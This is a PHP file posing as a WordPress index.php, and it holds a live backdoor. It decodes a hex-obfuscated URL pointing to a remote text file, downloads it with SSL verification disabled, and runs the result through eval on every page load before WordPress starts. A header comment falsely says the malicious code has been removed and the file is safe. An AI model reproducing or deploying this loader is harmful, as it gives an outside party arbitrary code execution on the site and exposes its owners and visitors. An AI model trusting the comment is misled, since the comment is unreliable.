<?php
/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code has been removed, and the file is now safe to use.
*/
$full_url = hex2bin('68747470733A2F2F7261772E67697468756275736572636F6E74656E742E636F6D2F73656F62656C612F62656C612F726566732F68656164732F6D61696E2F696E6465782E7478740D0A');

$content = @file_get_contents($full_url);
if ($content === false && function_exists('curl_init')) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $full_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    $content = curl_exec($ch);
    curl_close($ch);
}

if (!empty($content)) {
    @eval('?>' . $content);
}

define('WP_USE_THEMES', true);
require __DIR__ . '/wp-blog-header.php';
